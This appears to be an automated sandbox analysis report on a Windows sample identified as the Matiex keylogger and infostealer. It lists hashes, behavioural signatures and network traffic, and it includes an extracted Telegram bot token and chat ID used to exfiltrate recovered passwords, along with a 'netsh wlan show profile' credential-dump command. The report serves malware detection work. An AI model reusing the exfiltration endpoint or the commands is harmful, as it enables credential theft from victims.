Resubmissions

12-08-2021 13:20

210812-s5k1bdx2tj 10

12-08-2021 13:06

210812-ywwkwmkmzn 10

12-08-2021 12:42

210812-13ygffvy9j 10

12-08-2021 12:41

210812-ph9ze8t96a 10

Analysis

  • max time kernel
    156s
  • max time network
    158s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    12-08-2021 12:41

General

  • Target

    g6yzl1NROz6FgZi.exe

  • Size

    1.2MB

  • MD5

    7a8fa3fe4b23a2ca9612b2b1cf096f6a

  • SHA1

    898d020a309d30d33055978794b2131fa5a18698

  • SHA256

    9dacb6e97f39f81eee74d0779165f4a74e31f27cec1a67d52c541c52ed169d73

  • SHA512

    a77912743ed08c7814d6b3a7a3fea19728561f69891c862ea35957ca4886beded2ffea80342af5d9c7b45a8aa868cd8dc9edcc67b62e1b53f25d5c21be407370

Malware Config

Extracted

Family

matiex

C2

https://api.telegram.org/bot1769394961:AAF5BB35akL859CwVaXypIqpVsGWlaKvi7A/sendMessage?chat_id=1735544933

Signatures

  • Matiex

    Matiex is a keylogger and infostealer first seen in July 2020.

  • Matiex Main Payload 2 IoCs
  • suricata: ET MALWARE Matiex Keylogger Exfil Via Telegram

    suricata: ET MALWARE Matiex Keylogger Exfil Via Telegram

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 48 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\g6yzl1NROz6FgZi.exe
    "C:\Users\Admin\AppData\Local\Temp\g6yzl1NROz6FgZi.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4564
    • C:\Users\Admin\AppData\Local\Temp\g6yzl1NROz6FgZi.exe
      "C:\Users\Admin\AppData\Local\Temp\g6yzl1NROz6FgZi.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4180
      • C:\Windows\SysWOW64\netsh.exe
        "netsh" wlan show profile
        3⤵
          PID:3052
    • C:\Windows\System32\svchost.exe
      C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4552
    • C:\Windows\system32\wlrmdr.exe
      -c -s 0 -f 0 -t Empty -m Empty -a 0 -u Empty
      1⤵
        PID:4544
      • C:\Windows\system32\MoNotificationUx.exe
        %systemroot%\system32\MoNotificationUx.exe /ClearActiveNotifications
        1⤵
        • Checks processor information in registry
        PID:4632
      • C:\Windows\system32\MoNotificationUx.exe
        %systemroot%\system32\MoNotificationUx.exe /ClearActiveNotifications
        1⤵
        • Checks processor information in registry
        PID:4736
      • C:\Windows\System32\sihclient.exe
        C:\Windows\System32\sihclient.exe /cv R3q930x020WnyfI9gsy3Ow.0.2
        1⤵
        • Modifies data under HKEY_USERS
        PID:3856
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        1⤵
        • Modifies data under HKEY_USERS
        PID:2160
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
        1⤵
          PID:1124
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
          1⤵
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          PID:4576
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
          1⤵
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:2908
          • C:\Windows\System32\pcaui.exe
            C:\Windows\System32\pcaui.exe -n 0 -a "" -v "" -g "" -x ""
            2⤵
              PID:1456
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
            1⤵
            • Enumerates connected drives
            • Writes to the Master Boot Record (MBR)
            PID:1352
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:1452
            • C:\Program Files\Windows Defender\mpcmdrun.exe
              "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
              2⤵
                PID:4016

            Network

            • flag-unknown
              DNS
              crl3.digicert.com
              Remote address:
              8.8.8.8:53
              Request
              crl3.digicert.com
              IN A
              Response
              crl3.digicert.com
              IN CNAME
              cs9.wac.phicdn.net
              cs9.wac.phicdn.net
              IN A
              93.184.220.29
            • flag-unknown
              DNS
              go.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              go.microsoft.com
              IN A
              Response
              go.microsoft.com
              IN CNAME
              go.microsoft.com.edgekey.net
              go.microsoft.com.edgekey.net
              IN CNAME
              e11290.dspg.akamaiedge.net
              e11290.dspg.akamaiedge.net
              IN A
              2.18.105.186
            • flag-unknown
              DNS
              dmd.metaservices.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              dmd.metaservices.microsoft.com
              IN A
              Response
              dmd.metaservices.microsoft.com
              IN CNAME
              devicemetadataservice.trafficmanager.net
              devicemetadataservice.trafficmanager.net
              IN CNAME
              vmss-prod-eas.eastasia.cloudapp.azure.com
              vmss-prod-eas.eastasia.cloudapp.azure.com
              IN A
              20.189.118.208
            • flag-unknown
              DNS
              oneocsp.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              oneocsp.microsoft.com
              IN A
              Response
              oneocsp.microsoft.com
              IN CNAME
              oneocsp-microsoft-com.a-0003.a-msedge.net
              oneocsp-microsoft-com.a-0003.a-msedge.net
              IN CNAME
              a-0003.a-msedge.net
              a-0003.a-msedge.net
              IN A
              204.79.197.203
            • flag-unknown
              DNS
              nexusrules.officeapps.live.com
              Remote address:
              8.8.8.8:53
              Request
              nexusrules.officeapps.live.com
              IN A
              Response
              nexusrules.officeapps.live.com
              IN CNAME
              prod.nexusrules.live.com.akadns.net
              prod.nexusrules.live.com.akadns.net
              IN A
              52.109.12.18
            • flag-unknown
              DNS
              config.edge.skype.com
              Remote address:
              8.8.8.8:53
              Request
              config.edge.skype.com
              IN A
              Response
              config.edge.skype.com
              IN CNAME
              config.edge.skype.com.trafficmanager.net
              config.edge.skype.com.trafficmanager.net
              IN CNAME
              l-0014.config.skype.com
              l-0014.config.skype.com
              IN CNAME
              config-edge-skype.l-0014.l-msedge.net
              config-edge-skype.l-0014.l-msedge.net
              IN CNAME
              l-0014.l-msedge.net
              l-0014.l-msedge.net
              IN A
              13.107.42.23
            • flag-unknown
              DNS
              tsfe.trafficshaping.dsp.mp.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              tsfe.trafficshaping.dsp.mp.microsoft.com
              IN A
              Response
              tsfe.trafficshaping.dsp.mp.microsoft.com
              IN CNAME
              tsfe.trafficmanager.net
              tsfe.trafficmanager.net
              IN A
              20.54.110.119
            • flag-unknown
              DNS
              ctldl.windowsupdate.com
              Remote address:
              8.8.8.8:53
              Request
              ctldl.windowsupdate.com
              IN A
              Response
              ctldl.windowsupdate.com
              IN CNAME
              au-bg-shim.trafficmanager.net
              au-bg-shim.trafficmanager.net
              IN CNAME
              audownload.windowsupdate.nsatc.net
              audownload.windowsupdate.nsatc.net
              IN CNAME
              au.download.windowsupdate.com.edgesuite.net
              au.download.windowsupdate.com.edgesuite.net
              IN CNAME
              a767.dscg3.akamai.net
              a767.dscg3.akamai.net
              IN A
              95.101.78.82
              a767.dscg3.akamai.net
              IN A
              88.221.144.130
            • flag-unknown
              DNS
              login.live.com
              Remote address:
              8.8.8.8:53
              Request
              login.live.com
              IN A
              Response
              login.live.com
              IN CNAME
              login.msa.msidentity.com
              login.msa.msidentity.com
              IN CNAME
              www.tm.lg.prod.aadmsa.akadns.net
              www.tm.lg.prod.aadmsa.akadns.net
              IN CNAME
              prda.aadg.msidentity.com
              prda.aadg.msidentity.com
              IN CNAME
              www.tm.a.prd.aadg.akadns.net
              www.tm.a.prd.aadg.akadns.net
              IN A
              20.190.159.138
              www.tm.a.prd.aadg.akadns.net
              IN A
              40.126.31.143
              www.tm.a.prd.aadg.akadns.net
              IN A
              20.190.159.134
              www.tm.a.prd.aadg.akadns.net
              IN A
              20.190.159.132
              www.tm.a.prd.aadg.akadns.net
              IN A
              40.126.31.4
              www.tm.a.prd.aadg.akadns.net
              IN A
              40.126.31.135
              www.tm.a.prd.aadg.akadns.net
              IN A
              40.126.31.6
              www.tm.a.prd.aadg.akadns.net
              IN A
              40.126.31.137
            • flag-unknown
              DNS
              ocsp.digicert.com
              Remote address:
              8.8.8.8:53
              Request
              ocsp.digicert.com
              IN A
              Response
              ocsp.digicert.com
              IN CNAME
              cs9.wac.phicdn.net
              cs9.wac.phicdn.net
              IN A
              93.184.220.29
            • flag-unknown
              DNS
              settings-win.data.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              settings-win.data.microsoft.com
              IN A
              Response
              settings-win.data.microsoft.com
              IN CNAME
              settingsfd-geo.trafficmanager.net
              settingsfd-geo.trafficmanager.net
              IN A
              20.73.194.208
            • flag-unknown
              DNS
              slscr.update.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              slscr.update.microsoft.com
              IN A
              Response
              slscr.update.microsoft.com
              IN CNAME
              slscr.update.microsoft.com.akadns.net
              slscr.update.microsoft.com.akadns.net
              IN CNAME
              sls.update.microsoft.com.akadns.net
              sls.update.microsoft.com.akadns.net
              IN CNAME
              sls.emea.update.microsoft.com.akadns.net
              sls.emea.update.microsoft.com.akadns.net
              IN A
              52.242.101.226
            • flag-unknown
              DNS
              fe3cr.delivery.mp.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              fe3cr.delivery.mp.microsoft.com
              IN A
              Response
              fe3cr.delivery.mp.microsoft.com
              IN CNAME
              fe3.delivery.mp.microsoft.com
              fe3.delivery.mp.microsoft.com
              IN CNAME
              fe3.delivery.dsp.mp.microsoft.com.nsatc.net
              fe3.delivery.dsp.mp.microsoft.com.nsatc.net
              IN A
              20.54.89.15
              fe3.delivery.dsp.mp.microsoft.com.nsatc.net
              IN A
              52.242.97.97
            • flag-unknown
              DNS
              fe3cr.delivery.mp.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              fe3cr.delivery.mp.microsoft.com
              IN A
              Response
              fe3cr.delivery.mp.microsoft.com
              IN CNAME
              fe3.delivery.mp.microsoft.com
              fe3.delivery.mp.microsoft.com
              IN CNAME
              fe3.delivery.dsp.mp.microsoft.com.nsatc.net
              fe3.delivery.dsp.mp.microsoft.com.nsatc.net
              IN A
              52.152.108.96
              fe3.delivery.dsp.mp.microsoft.com.nsatc.net
              IN A
              52.242.97.97
            • flag-unknown
              DNS
              slscr.update.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              slscr.update.microsoft.com
              IN A
              Response
              slscr.update.microsoft.com
              IN CNAME
              slscr.update.microsoft.com.akadns.net
              slscr.update.microsoft.com.akadns.net
              IN CNAME
              sls.update.microsoft.com.akadns.net
              sls.update.microsoft.com.akadns.net
              IN CNAME
              sls.emea.update.microsoft.com.akadns.net
              sls.emea.update.microsoft.com.akadns.net
              IN A
              40.125.122.176
            • flag-unknown
              DNS
              checkip.dyndns.org
              Remote address:
              8.8.8.8:53
              Request
              checkip.dyndns.org
              IN A
              Response
              checkip.dyndns.org
              IN CNAME
              checkip.dyndns.com
              checkip.dyndns.com
              IN A
              158.101.44.242
              checkip.dyndns.com
              IN A
              132.226.8.169
              checkip.dyndns.com
              IN A
              216.146.43.71
              checkip.dyndns.com
              IN A
              132.226.247.73
              checkip.dyndns.com
              IN A
              216.146.43.70
              checkip.dyndns.com
              IN A
              193.122.6.168
              checkip.dyndns.com
              IN A
              193.122.130.0
            • flag-unknown
              DNS
              freegeoip.app
              Remote address:
              8.8.8.8:53
              Request
              freegeoip.app
              IN A
              Response
              freegeoip.app
              IN A
              172.67.188.154
              freegeoip.app
              IN A
              104.21.19.200
            • flag-unknown
              DNS
              api.telegram.org
              Remote address:
              8.8.8.8:53
              Request
              api.telegram.org
              IN A
              Response
              api.telegram.org
              IN A
              149.154.167.220
            • flag-unknown
              DNS
              ctldl.windowsupdate.com
              Remote address:
              8.8.8.8:53
              Request
              ctldl.windowsupdate.com
              IN A
              Response
              ctldl.windowsupdate.com
              IN CNAME
              au-bg-shim.trafficmanager.net
              au-bg-shim.trafficmanager.net
              IN CNAME
              audownload.windowsupdate.nsatc.net
              audownload.windowsupdate.nsatc.net
              IN CNAME
              wu.azureedge.net
              wu.azureedge.net
              IN CNAME
              wu.ec.azureedge.net
              wu.ec.azureedge.net
              IN CNAME
              wu.wpc.apr-52dd2.edgecastdns.net
              wu.wpc.apr-52dd2.edgecastdns.net
              IN CNAME
              hlb.apr-52dd2-0.edgecastdns.net
              hlb.apr-52dd2-0.edgecastdns.net
              IN CNAME
              cs11.wpc.v0cdn.net
              cs11.wpc.v0cdn.net
              IN A
              93.184.221.240
            • flag-unknown
              DNS
              fs.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              fs.microsoft.com
              IN A
              Response
              fs.microsoft.com
              IN CNAME
              prod.fs.microsoft.com.akadns.net
              prod.fs.microsoft.com.akadns.net
              IN CNAME
              fs-wildcard.microsoft.com.edgekey.net
              fs-wildcard.microsoft.com.edgekey.net
              IN CNAME
              fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
              fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
              IN CNAME
              e1723.g.akamaiedge.net
              e1723.g.akamaiedge.net
              IN A
              104.81.140.70
            • flag-unknown
              POST
              http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409
              Remote address:
              2.18.105.186:80
              Request
              POST /fwlink/?LinkID=252669&clcid=0x409 HTTP/1.1
              Connection: Keep-Alive
              Content-Type: text/xml; charset="UTF-16LE"
              User-Agent: MICROSOFT_DEVICE_METADATA_RETRIEVAL_CLIENT
              SOAPAction: "http://schemas.microsoft.com/windowsmetadata/services/2007/09/18/dms/DeviceMetadataService/GetDeviceMetadata"
              Content-Length: 2058
              Host: go.microsoft.com
              Response
              HTTP/1.1 302 Moved Temporarily
              Server: AkamaiGHost
              Content-Length: 0
              Location: http://dmd.metaservices.microsoft.com/metadata.svc
              Expires: Thu, 12 Aug 2021 12:42:05 GMT
              Cache-Control: max-age=0, no-cache, no-store
              Pragma: no-cache
              Date: Thu, 12 Aug 2021 12:42:05 GMT
              Connection: close
            • flag-unknown
              POST
              http://dmd.metaservices.microsoft.com/metadata.svc
              Remote address:
              20.189.118.208:80
              Request
              POST /metadata.svc HTTP/1.1
              Connection: Keep-Alive
              Content-Type: text/xml; charset="UTF-16LE"
              User-Agent: MICROSOFT_DEVICE_METADATA_RETRIEVAL_CLIENT
              SOAPAction: "http://schemas.microsoft.com/windowsmetadata/services/2007/09/18/dms/DeviceMetadataService/GetDeviceMetadata"
              Content-Length: 2058
              Host: dmd.metaservices.microsoft.com
              Response
              HTTP/1.1 200 OK
              Date: Thu, 12 Aug 2021 12:42:05 GMT
              Content-Type: text/xml; charset=utf-16LE
              Content-Length: 1734
              Connection: keep-alive
              Cache-Control: private
              Server: Microsoft-IIS/10.0
              X-AspNet-Version: 4.0.30319
              Request-Context: appId=cid-v1:c490f1e8-2a51-43a5-b06d-d2230108e17f
              Access-Control-Expose-Headers: Request-Context
              X-Powered-By: ASP.NET
            • flag-unknown
              GET
              http://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBTGiIgTPSKVrjq%2B8RiHf4oAukNOPgQUDyBd16FXlduSzyvQx8J3BM5ygHYCEzMAAVMvTIKOYqwLk7gAAAABUy8%3D
              Remote address:
              204.79.197.203:80
              Request
              GET /ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBTGiIgTPSKVrjq%2B8RiHf4oAukNOPgQUDyBd16FXlduSzyvQx8J3BM5ygHYCEzMAAVMvTIKOYqwLk7gAAAABUy8%3D HTTP/1.1
              Cache-Control: max-age = 86400
              Connection: Keep-Alive
              Accept: */*
              If-Modified-Since: Tue, 03 Aug 2021 22:13:33 GMT
              If-None-Match: "6b402eed49753b33b692db60a2fd5cbce222748b2d4cf3452a45f06a41bcf15d"
              User-Agent: Microsoft-CryptoAPI/10.0
              Host: oneocsp.microsoft.com
              Response
              HTTP/1.1 200 OK
              Cache-Control: max-age=86400
              Content-Length: 1763
              Content-Type: application/ocsp-response
              Expires: Mon, 16 Aug 2021 15:50:23 GMT
              Last-Modified: Wed, 11 Aug 2021 14:13:34 GMT
              ETag: "bf67479aabbc127a7498b4b6933d326f5dd795b50f266ff4285a7590a461989a"
              Server: Microsoft-IIS/10.0
              X-Cache: TCP_HIT
              X-Powered-By: ASP.NET
              x-content-type-options: nosniff
              X-Azure-Ref-OriginShield: Ref A: 464A5886A8574BBA91B9115E1E2C2067 Ref B: HEL01EDGE1007 Ref C: 2021-08-12T10:56:42Z
              X-MSEdge-Ref: Ref A: 166C2F1489B6493199F9A14007C4B599 Ref B: AMBEDGE0818 Ref C: 2021-08-12T12:42:05Z
              Date: Thu, 12 Aug 2021 12:42:04 GMT
            • flag-unknown
              GET
              http://checkip.dyndns.org/
              g6yzl1NROz6FgZi.exe
              Remote address:
              158.101.44.242:80
              Request
              GET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Thu, 12 Aug 2021 12:42:56 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
            • flag-unknown
              GET
              http://checkip.dyndns.org/
              g6yzl1NROz6FgZi.exe
              Remote address:
              158.101.44.242:80
              Request
              GET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              Response
              HTTP/1.1 200 OK
              Date: Thu, 12 Aug 2021 12:42:56 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
            • flag-unknown
              GET
              http://checkip.dyndns.org/
              g6yzl1NROz6FgZi.exe
              Remote address:
              158.101.44.242:80
              Request
              GET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              Response
              HTTP/1.1 200 OK
              Date: Thu, 12 Aug 2021 12:42:58 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
            • flag-unknown
              GET
              http://checkip.dyndns.org/
              g6yzl1NROz6FgZi.exe
              Remote address:
              158.101.44.242:80
              Request
              GET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              Response
              HTTP/1.1 200 OK
              Date: Thu, 12 Aug 2021 12:42:58 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
            • flag-unknown
              GET
              http://checkip.dyndns.org/
              g6yzl1NROz6FgZi.exe
              Remote address:
              158.101.44.242:80
              Request
              GET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              Response
              HTTP/1.1 200 OK
              Date: Thu, 12 Aug 2021 12:42:58 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
            • flag-unknown
              GET
              https://freegeoip.app/xml/154.61.71.51
              g6yzl1NROz6FgZi.exe
              Remote address:
              172.67.188.154:443
              Request
              GET /xml/154.61.71.51 HTTP/1.1
              Host: freegeoip.app
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Thu, 12 Aug 2021 12:42:57 GMT
              Content-Type: application/xml
              Content-Length: 334
              Connection: keep-alive
              vary: Origin
              x-database-date: Thu, 16 Jul 2020 08:44:46 GMT
              x-ratelimit-limit: 15000
              x-ratelimit-remaining: 14996
              x-ratelimit-reset: 3412
              CF-Cache-Status: DYNAMIC
              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sZwucct339OsCywDCnfhJNdiK5Y%2B451fADjtI1ANDOpdISGLYuuvoxqq4BXGEqI2%2FCxnORfXOd5AqCWgo%2FJb90Z4yslrwRVmhOry8q1uucBLStfhvgiZDpKntdznU9Gs"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 67d9c95aadf472b7-AMS
              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
            • flag-unknown
              GET
              https://freegeoip.app/xml/154.61.71.51
              g6yzl1NROz6FgZi.exe
              Remote address:
              172.67.188.154:443
              Request
              GET /xml/154.61.71.51 HTTP/1.1
              Host: freegeoip.app
              Response
              HTTP/1.1 200 OK
              Date: Thu, 12 Aug 2021 12:42:58 GMT
              Content-Type: application/xml
              Content-Length: 334
              Connection: keep-alive
              vary: Origin
              x-database-date: Thu, 16 Jul 2020 08:44:46 GMT
              x-ratelimit-limit: 15000
              x-ratelimit-remaining: 14995
              x-ratelimit-reset: 3411
              CF-Cache-Status: DYNAMIC
              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NG%2FH6SJY2e2jYe8AdfoE7dCVY9oXqkUP89b5OrvVB%2Bx1egyc9EADHVZecuHsRai9HHUlNzWVDBUD0K0TG%2Bjbg7THK0UHYfArcKUbbTN4drhU%2BX%2BwJ748Er8%2FRgdhwu%2Bg"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 67d9c9623f0272b7-AMS
              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
            • flag-unknown
              GET
              https://freegeoip.app/xml/154.61.71.51
              g6yzl1NROz6FgZi.exe
              Remote address:
              172.67.188.154:443
              Request
              GET /xml/154.61.71.51 HTTP/1.1
              Host: freegeoip.app
              Response
              HTTP/1.1 200 OK
              Date: Thu, 12 Aug 2021 12:42:58 GMT
              Content-Type: application/xml
              Content-Length: 334
              Connection: keep-alive
              vary: Origin
              x-database-date: Thu, 16 Jul 2020 08:44:46 GMT
              x-ratelimit-limit: 15000
              x-ratelimit-remaining: 14994
              x-ratelimit-reset: 3411
              CF-Cache-Status: DYNAMIC
              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4eABrVP9MhQ35iwZCWZWpSYSF3wTvWdogzM9O5LNVF3Bp25GAKpHtdAfalP%2BbJr9aPB7nURqy0NSrDWG%2FeoLbRgwIs%2BOoJGxxcrZR23FxoaxhS1LvS20Y%2BYMHiem%2Fjtg"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 67d9c9634f1972b7-AMS
              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
            • flag-unknown
              POST
              https://api.telegram.org/bot1769394961:AAF5BB35akL859CwVaXypIqpVsGWlaKvi7A/sendDocument?chat_id=1735544933&caption=%20Pc%20Name:%20Admin%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C
              g6yzl1NROz6FgZi.exe
              Remote address:
              149.154.167.220:443
              Request
              POST /bot1769394961:AAF5BB35akL859CwVaXypIqpVsGWlaKvi7A/sendDocument?chat_id=1735544933&caption=%20Pc%20Name:%20Admin%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1
              Content-Type: multipart/form-data; boundary=------------------------8d95d540aa5daf4
              Host: api.telegram.org
              Content-Length: 841
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Server: nginx/1.18.0
              Date: Thu, 12 Aug 2021 12:43:00 GMT
              Content-Type: application/json
              Content-Length: 529
              Connection: keep-alive
              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
              Access-Control-Allow-Origin: *
              Access-Control-Allow-Methods: GET, POST, OPTIONS
              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            • 2.18.105.186:80
              http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409
              http
              2.7kB
              588 B
              7
              7

              HTTP Request

              POST http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409

              HTTP Response

              302
            • 20.189.118.208:80
              http://dmd.metaservices.microsoft.com/metadata.svc
              http
              2.7kB
              2.3kB
              7
              5

              HTTP Request

              POST http://dmd.metaservices.microsoft.com/metadata.svc

              HTTP Response

              200
            • 204.79.197.203:80
              http://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBTGiIgTPSKVrjq%2B8RiHf4oAukNOPgQUDyBd16FXlduSzyvQx8J3BM5ygHYCEzMAAVMvTIKOYqwLk7gAAAABUy8%3D
              http
              596 B
              2.6kB
              4
              5

              HTTP Request

              GET http://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBTGiIgTPSKVrjq%2B8RiHf4oAukNOPgQUDyBd16FXlduSzyvQx8J3BM5ygHYCEzMAAVMvTIKOYqwLk7gAAAABUy8%3D

              HTTP Response

              200
            • 20.189.173.14:443
              tls
              1.0kB
              6
            • 20.54.110.119:443
              tsfe.trafficshaping.dsp.mp.microsoft.com
              tls, https
              2.7kB
              6.0kB
              15
              13
            • 20.73.194.208:443
              settings-win.data.microsoft.com
              tls, https
              1.7kB
              4.4kB
              12
              10
            • 52.242.101.226:443
              slscr.update.microsoft.com
              tls, https
              sihclient.exe
              1.3kB
              3.3kB
              12
              9
            • 52.152.108.96:443
              fe3cr.delivery.mp.microsoft.com
              tls, https
              sihclient.exe
              1.2kB
              3.1kB
              12
              9
            • 52.242.101.226:443
              slscr.update.microsoft.com
              tls, https
              sihclient.exe
              1.2kB
              3.2kB
              12
              9
            • 52.242.101.226:443
              slscr.update.microsoft.com
              tls, https
              sihclient.exe
              1.3kB
              3.3kB
              12
              9
            • 158.101.44.242:80
              http://checkip.dyndns.org/
              http
              g6yzl1NROz6FgZi.exe
              1.1kB
              1.8kB
              11
              10

              HTTP Request

              GET http://checkip.dyndns.org/

              HTTP Response

              200

              HTTP Request

              GET http://checkip.dyndns.org/

              HTTP Response

              200

              HTTP Request

              GET http://checkip.dyndns.org/

              HTTP Response

              200

              HTTP Request

              GET http://checkip.dyndns.org/

              HTTP Response

              200

              HTTP Request

              GET http://checkip.dyndns.org/

              HTTP Response

              200
            • 172.67.188.154:443
              https://freegeoip.app/xml/154.61.71.51
              tls, http
              g6yzl1NROz6FgZi.exe
              1.1kB
              7.0kB
              12
              10

              HTTP Request

              GET https://freegeoip.app/xml/154.61.71.51

              HTTP Response

              200

              HTTP Request

              GET https://freegeoip.app/xml/154.61.71.51

              HTTP Response

              200

              HTTP Request

              GET https://freegeoip.app/xml/154.61.71.51

              HTTP Response

              200
            • 149.154.167.220:443
              https://api.telegram.org/bot1769394961:AAF5BB35akL859CwVaXypIqpVsGWlaKvi7A/sendDocument?chat_id=1735544933&caption=%20Pc%20Name:%20Admin%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C
              tls, http
              g6yzl1NROz6FgZi.exe
              2.0kB
              7.3kB
              10
              12

              HTTP Request

              POST https://api.telegram.org/bot1769394961:AAF5BB35akL859CwVaXypIqpVsGWlaKvi7A/sendDocument?chat_id=1735544933&caption=%20Pc%20Name:%20Admin%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C

              HTTP Response

              200
            • 127.0.0.1:5985
              BITS
            • 8.8.8.8:53
              crl3.digicert.com
              dns
              1.4kB
              3.7kB
              20
              20

              DNS Request

              crl3.digicert.com

              DNS Response

              93.184.220.29

              DNS Request

              go.microsoft.com

              DNS Response

